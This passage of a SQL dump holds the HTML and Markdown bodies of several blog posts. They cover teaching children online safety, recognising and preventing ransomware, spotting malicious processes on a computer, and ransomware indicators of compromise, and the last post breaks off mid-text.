Remind them that it’s okay to ask trusted adults for help when something doesn’t feel right.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Helping them understand the value and consequences of their online actions fosters responsibility and care.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5: Make Cybersecurity Fun</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learning doesn’t have to be boring. There are tons of enjoyable and interactive resources you can use to teach cybersecurity.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Educational Games</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Look for games and apps that teach cybersecurity concepts. 
Platforms like “Interland” from Google’s \'Be Internet Awesome\' program offer engaging ways for kids to learn how to stay safe online.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Creative Activities</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Create crossword puzzles or quizzes where kids can practice identifying phishing emails or coming up with strong passwords.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Role-Playing</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Turn learning into a game by role-playing scenarios where they need to outsmart a hacker trying to steal their personal information.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you turn cybersecurity education into a hands-on experience, it’s more likely to stick.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6: Lead By Example</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Kids learn through observation, so it’s crucial to model the online behavior you want them to adopt.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 
[&amp;&gt;ul]:!pb-0\" value=\"1\">Use strong passwords for your accounts and explain why you do so.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid sharing sensitive information online and encourage transparency about your internet use.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Keep lines of communication open—remind kids they can always ask you questions about cybersecurity.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your actions, paired with open and honest conversations, will reinforce the importance of good digital habits.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Skills for a Lifetime</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Teaching kids about cybersecurity isn’t just a one-time lesson—it’s an ongoing process that grows with their understanding of the internet and how they use it. 
By starting with the basics, using relatable scenarios, and creating fun, engaging learning opportunities, you can give kids the tools they need to confidently and safely explore the digital world.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether your child is playing online games, messaging friends, or exploring new apps, cybersecurity knowledge will go a long way in empowering them to feel in control of their online lives.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, the skills kids develop now will create habits that last a lifetime, setting them up for a future where they can use technology responsibly and safely.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital future is bright—when approached with care and awareness, it’s a place your kids can thrive!</p>', '', NULL, NULL, 1, 'draft', '2023-10-23 02:30:05', '2026-01-12 21:41:44', 'CyberKids', 'Roadmap for Teaching Cybersecurity to Kids', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(144, 'Everything about Ransomware', 'everything-about-ransomware', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware is one of the fastest-growing cybersecurity threats, affecting individuals and organizations across the globe. It’s a malicious type of software designed to encrypt a victim\'s files and hold them hostage until a ransom is paid. Over the years, ransomware attacks have become increasingly sophisticated, utilizing innovative techniques to infiltrate devices and spread across networks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog post will break down the key aspects of ransomware, helping you identify and mitigate the risks. From understanding the warning signs (Indicators of Compromise) to implementing essential safeguards, we’ll cover everything you need to know to protect yourself and your organization.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Ransomware?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware is a form of malware that locks users out of their own data by encrypting their files. Attackers then demand payment in return for the decryption key needed to recover access. These attacks target everyone from individual users to large corporations, often causing widespread disruption and financial strain.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Why is ransomware so dangerous? Beyond the financial costs, it risks sensitive data being exposed–or permanently erased if the ransom isn’t paid. 
And even when payments are made, there’s no guarantee the attackers will provide the decryption key.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Indicators of Compromise (IoCs): Recognizing Early Signs</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Knowing the early warning signs of a ransomware attack can help you take swift action before the damage becomes too severe. Here are the most common indicators of compromise (IoCs) to look out for:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. File Encryption</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most noticeable signs of a ransomware attack is the encryption of files. You may see files with unfamiliar extensions, or their names could be altered. Additionally, ransom notes or files named “DECRYPT_INSTRUCTIONS” often appear in affected folders, providing payment details and decryption instructions. Keep in mind that visible encryption is the final stage of the attack—by this point the attacker has usually been inside the environment for some time—so the earlier, quieter indicators below are the ones that give you a real chance to intervene.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Unusual Network Activity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Spikes in outgoing network traffic or unusual activity on your network could point to ransomware at work. Large outbound transfers are a particular red flag: many groups exfiltrate data before encrypting it so they can also threaten to leak it. Attackers also use command-and-control servers to direct their attacks, so connections to unfamiliar external hosts deserve scrutiny. Monitoring tools and firewalls are essential for detecting such anomalies promptly.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
New or Suspicious Processes</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A ransomware attack can create new processes or services on your system. These may have strange or unfamiliar names that don’t align with standard operating system processes. Keep an eye on newly created processes.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Registry Modifications</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware often makes changes to the system registry to embed itself more deeply. Look for new or altered registry entries—manual inspections and security tools can reveal these.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Odd Activity in Event Logs</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware typically generates suspicious activity in your system’s event logs. These logs might reveal details such as the time and origin of the attack or show processes connected to the malware. Regularly reviewing event logs can provide meaningful insights into potential threats.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Protecting Yourself Against Ransomware</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While ransomware can be devastating, implementing robust mitigation strategies can significantly reduce the risk. 
Here are critical steps to safeguard your files and systems effectively.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">a. Regular Backups</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Reliable backups are your best recovery option: even if an attack occurs, you’ll have a way to restore your files without paying a ransom. Store these backups on external devices or secure cloud storage that isn’t accessible through your network—modern ransomware deliberately looks for and encrypts or deletes any backup it can reach, so keep at least one copy offline or in immutable storage protected by separate credentials. Test your restores regularly; a backup you have never restored from is not yet a backup. Backups also cannot undo data theft, which is why the preventive measures below still matter.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">b. Keep Software and Operating Systems Updated</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers often exploit outdated software with known vulnerabilities to spread ransomware. Regularly updating your operating system and software closes the known holes most campaigns rely on, although it cannot protect against flaws that have not yet been fixed. Automated updates can make this process seamless.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">c. Enable Firewall Protection</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A firewall acts as the first line of defense by blocking unauthorized access to your network. Advanced firewalls can even block communications to known malicious IP addresses. Ensure your firewall is properly configured to both monitor and filter traffic, and in particular do not expose remote-desktop or other administrative services directly to the internet; require multi-factor authentication for any remote access you do allow.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">d. 
Use Antivirus Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Antivirus software is key to identifying and eliminating ransomware before it harms your files. Choose an antivirus solution that offers real-time protection and routinely scan your system for threats. Always ensure the software is updated to counter emerging threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">e. Secure Your Email</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Email remains one of the primary modes for delivering ransomware, often through phishing scams or malicious attachments. Employ email filtering solutions to block suspicious messages and educate employees and users about identifying phishing attempts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">f. User Education and Awareness</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Human error is a leading cause of successful ransomware infections. Providing regular training to employees or household users can create a more security-conscious environment. Training should emphasize recognizing phishing emails, avoiding suspicious links or unknown downloads, and reporting unusual activity to IT support immediately.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The threat of ransomware isn’t going away anytime soon, but understanding its mechanics, recognizing early warning signs, and implementing robust security measures can diminish its impact. 
By taking preventative steps like backing up data, updating software, and training users, you can stay ahead of potential threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is everyone’s responsibility. Whether you’re protecting personal data or safeguarding your organization, a proactive approach is key. Ransomware is sophisticated, but with vigilance and the right measures, you can stay one step ahead.</p>', '', NULL, NULL, 1, 'draft', '2023-08-01 02:27:57', '2026-01-12 21:41:44', 'Information Security', 'Everything about Ransomware', '', NULL),
(145, 'Teach children about cybersecurity', 'teach-children-about-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With technology playing an integral role in our daily lives, teaching children about cybersecurity has never been more crucial. Today’s children are growing up in a digital-first world where the internet is a constant companion, whether for education, entertainment, or social interactions. Yet, this increased exposure also comes with significant risks. Building cybersecurity literacy from an early age empowers children to stay safe and make responsible choices online, ensuring they are prepared to handle the challenges posed by the digital age.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Children Are Vulnerable to Cyber Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Children, by nature, are more susceptible to cyber threats than adults. They often lack the knowledge or experience required to identify potential dangers, making them easy targets for malicious activities like phishing, cyberbullying, or even online predators. Unlike adults, children may not fully comprehend the consequences of sharing personal information or clicking on suspicious links, leaving them exposed to identity theft, scams, or harmful interactions.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By educating children about cybersecurity, we equip them with the tools they need to protect themselves online. 
Making them aware of potential risks empowers them to make smarter decisions, such as avoiding unsafe behavior and recognizing suspicious activity.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Cybersecurity Education</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity education for children isn’t just about teaching them to avoid risks—it’s about fostering responsibility and critical thinking when navigating the digital world. Here are some key areas where cybersecurity knowledge can make a difference:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Developing Safe Online Habits:</strong></b> Children will learn to create strong passwords, recognize secure websites, and avoid giving out personal information unnecessarily.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Recognizing Cyber Threats:</strong></b> Understanding common online dangers, such as phishing scams, malware, and cyberbullying, helps children protect themselves and others.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Protecting Privacy:</strong></b> Teaching children how to adjust privacy settings on social media platforms and secure their devices ensures greater control over who can access their information.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" 
dir=\"ltr\">By instilling these habits early, children are better prepared for the rapidly evolving digital environment—not just today but throughout their lives.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">A Lifelong Skill with Future Implications</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity literacy extends far beyond childhood. It is quickly becoming an essential life skill for personal safety, privacy, and even future career success. With workplaces increasingly relying on technology, the ability to recognize and mitigate cybersecurity risks will provide teenagers and young adults with a competitive edge in the job market.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Additionally, as advancements in technology blur the boundaries between online and offline life, cybersecurity knowledge is critical for safeguarding personal information. From financial transactions to cloud storage, every facet of modern life involves some level of digital interaction. Providing children with a foundation in cybersecurity ensures they’re not only protected but also adept at managing risks in a tech-driven world.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Teach Your Children About Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Teaching children about cybersecurity doesn’t have to be intimidating. With the right approach, these lessons can be integrated into daily conversations and practices, making them easy to understand and follow. 
Here are some actionable tips:</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Encourage Strong Passwords</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Teach children how to create strong passwords that include a mix of letters, numbers, and special characters. Explain the importance of keeping passwords private and avoiding common words or easily guessed phrases. Strong passwords are vital for keeping unauthorized users out of their accounts and personal data secure.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Discuss Online Risks</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Have open and age-appropriate conversations about potential dangers online. Explain the concept of cyberbullying and its effects, and provide examples of how online predators operate. Helping children understand these risks will encourage them to approach online interactions with caution.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Teach Them to Spot Phishing Scams</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Explain the dangers of phishing emails and messages, which are often used by scammers and hackers to steal information. 
Teach children not to click on links from unknown sources and to be skeptical of unexpected emails, especially if they ask for personal information.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Adjust Privacy Settings</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Show children how to use privacy settings on social media platforms and other online services. Help them restrict who can view their posts and personal details, ensuring that their online presence remains secure.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Keep Devices Updated</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Explain why software updates are essential for security. Encourage children to regularly update their devices and apps, emphasizing that these updates often include fixes to vulnerabilities that hackers could exploit.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Building a Safer Digital Future</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The investment in cybersecurity education ultimately leads to better technology use and resilience against threats. By teaching children about cybersecurity, parents and educators can play a pivotal role in shaping a generation that is digitally responsible, aware, and capable of making informed decisions online.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just about protecting devices; it’s about protecting futures. 
Introducing children to these principles early ensures they grow up equipped to handle the demands of an increasingly connected world—helping them thrive safely in both their personal and professional lives</p>', '', NULL, NULL, 1, 'draft', '2023-08-01 02:22:19', '2026-01-12 21:41:44', 'CyberKids', 'Teach children about cybersecurity', '', NULL),
(146, 'Protect Your Computer: Identifying and Eliminating Malicious Processes', 'processes-that-are-running-on-a-computer-can-be-malicious', '# Understanding and Combating Malicious Processes\n\nWith every click, download, and file opened, your computer is exposed to potential cyber threats. Malicious processes are a critical component of these threats, often running unnoticed in the background while jeopardizing your data and slowing down system performance. Understanding how to identify and address these processes is a vital step in protecting your system and maintaining smooth operations.\n\nThis guide dives into the telltale signs of malicious processes and provides actionable steps to safeguard your computer.\n\n## What are Malicious Processes?\n\nA malicious process is any active computer program running without your consent or for harmful purposes. These can come in various forms, including malware, spyware, ransomware, or even disguised system utilities. Often unseen, they can wreak havoc by consuming resources, stealing sensitive information, or giving attackers unauthorized access to your system.\n\n## Signs of a Malicious Process\n\nIdentifying malicious processes early can prevent extensive damage to your computer and data. Here are the key indicators to watch out for:\n\n### 1. High Usage of System Resources\n\nIf your computer is running slower than usual or frequently freezes, it might not just be old hardware—malicious processes often consume an unusual amount of CPU or memory. To check, open your Task Manager (Ctrl + Shift + Esc on Windows) and identify any program consuming excessive resources without a clear reason.\n\n### 2. Unknown or Suspicious Process Names\n\nSometimes, malicious processes disguise themselves as legitimate ones. Be especially wary of programs with names resembling critical system files, like \"svchost.exe.\" While legitimate files are essential for Windows, their names are commonly mimicked by malicious programs. 
If you spot an unrecognizable name in your Task Manager, take a moment to research it online using trusted sources.\n\n### 3. Unusual Network Activity\n\nMalicious processes often connect to remote servers. These connections may serve to send your personal data out or receive commands from an attacker. Using Task Manager or a network monitoring tool, keep an eye on ongoing network activity. If a process is sending or receiving significant amounts of data without your authorization, it’s a red flag.\n\n### 4. Unexpected File or Registry Changes\n\nHave you noticed new files or suspicious system changes? Certain malicious processes make unauthorized modifications to files, folders, or even the registry. These changes might not be immediately obvious, but monitoring tools or sudden irregularities in system settings can point to hidden threats.\n\n### 5. Running in the Background\n\nMany harmful processes operate in the background without any visible sign of their existence. You may not see a window or notification, but they continue to perform activities that could harm your computer. Regularly reviewing processes in the Task Manager can help detect these covert threats before they cause damage.\n\n## What to Do if You Suspect a Malicious Process\n\nNot all suspicious processes are necessarily harmful. However, if you identify one or more of the signs listed above, it’s important to proceed cautiously without abruptly terminating the process. Here’s what you should do next:\n\n1. **Research the Process**  \n   Search the process name online to see if it’s legitimate or potentially harmful, but don’t stop at the name—malware routinely borrows legitimate ones. Check where the executable actually lives (a genuine `svchost.exe` runs from `C:\\Windows\\System32`, not a user or temp folder), whether it carries a valid publisher signature, and what its parent process is; if doubt remains, look up the file’s SHA-256 hash on a file-reputation service. Forums and support sites can often shed light on questionable software.\n\n2. **Run a Full System Scan**  \n   Use updated antivirus software to perform a thorough scan of your computer. The scan will detect and remove many malicious programs automatically.\n\n3. 
**Seek Professional Assistance**  \n   If you\'re unsure about handling a suspicious process or the issue persists after running antivirus software, consider consulting a cybersecurity professional.\n\n4. **Avoid Hasty Actions**  \n   Avoid force-stopping processes unless you\'re confident they’re malicious; terminating critical system processes can cause your computer to malfunction.\n\n## Building a Multi-Layered Defense\n\nThe best way to deal with malicious processes is to prevent them entirely. A multi-layered security approach reduces the chances of malware slipping through while addressing potential threats more effectively. Here’s how to build this defense for your computer:\n\n- **Antivirus Software**  \n  Install and regularly update antivirus software to catch and remove malware before it takes hold.\n\n- **Firewalls**  \n  A firewall helps block unauthorized access to your system, acting as the first line of defense against external threats.\n\n- **Intrusion Detection Systems (IDS)**  \n  An IDS monitors your network for unusual activity and alerts you to any suspicious actions.\n\n- **Regular Security Updates**  \n  Always keep your operating system and software up to date. Security patches fix vulnerabilities that attackers might exploit.\n\n- **Monitoring Tools**  \n  Consider using tools like Malwarebytes, Process Explorer, or GlassWire to monitor and protect your system proactively.\n\n## Protect Your System, Protect Your Data\n\nMaintaining a secure computer is no longer optional—it’s a necessity as cyber threats grow more sophisticated. By staying vigilant, regularly inspecting your processes, and implementing a robust security strategy, you can ensure your system remains safe, fast, and reliable.\n\nDo you suspect a malicious process on your system? Start by using the steps outlined here, and explore advanced security tools and professional support if needed. 
Taking action today could save you from costly consequences tomorrow.', '', 'http://infoseclabs.io/uploads/1773250040055-60233776.jpg', 'Computer screen displaying a task manager with suspicious processes', 1, 'published', '2026-03-08 18:57:00', '2026-03-11 20:27:23', 'Information Security', 'Protect Your PC: Spot & Stop Malicious Processes', 'Learn to identify and eliminate malicious processes to safeguard your computer from cyber threats and ensure smooth performance.', 'malicious processes'),
(147, 'What are IoCs of RANSOMWARE on the endpoints?', 'what-are-iocs-of-ransomware-on-the-endpoints', '# Understanding Indicators of Compromise for Ransomware Detection\n\nRansomware attacks continue to be one of the most pressing cybersecurity threats of our time. These attacks, which encrypt files and demand a ransom for their release, can cripple businesses, compromise sensitive data, and incur substantial financial losses. The key to mitigating the damage caused by ransomware is early detection, which is where Indicators of Compromise (IoCs) come into play.\n\nIoCs are evidence-based clues that security teams can use to identify, track, and respond to potential intrusions or malware infections. Below, we explore some of the key IoCs for detecting ransomware on endpoints, helping businesses enhance their security posture and respond quickly to threats.\n\n## 1. File Hashes as Indicators of Compromise\n\nHash values, such as MD5, SHA-1, or SHA-256, serve as digital fingerprints for files. For ransomware, the hashes that work as shareable IoCs are those of the malicious artifacts themselves—the dropper, the encryptor binary, loader scripts, and the ransom-note template—published in threat intelligence feeds and matched against files on your endpoints. The hash of a victim’s document after encryption is unpredictable and unique to that machine, so it is not something you can look up; the fact that many files changed hash at once is a file-integrity-monitoring signal rather than a hash IoC. Security teams can use known-bad hashes to:\n\n- Confirm which ransomware family is present and which files carried it.\n- Identify the extent of ransomware activity by finding the same artifact on other hosts.\n- Strengthen response measures by quarantining matching files and blocking their execution.\n\nAttackers routinely recompile or pad payloads, so a hash miss is not proof of absence; pair hash matching with the behavioral indicators below.\n\n**Example:**  \nIf an endpoint scan finds a file whose SHA-256 matches a hash published for a known ransomware strain, or if file-integrity monitoring reports hundreds of user documents changing hash within minutes, either could be early evidence of a ransomware attack.\n\n## 2. Suspicious Processes and Services\n\nAnother tell-tale sign of ransomware is the presence of unexpected processes or services running on an endpoint. 
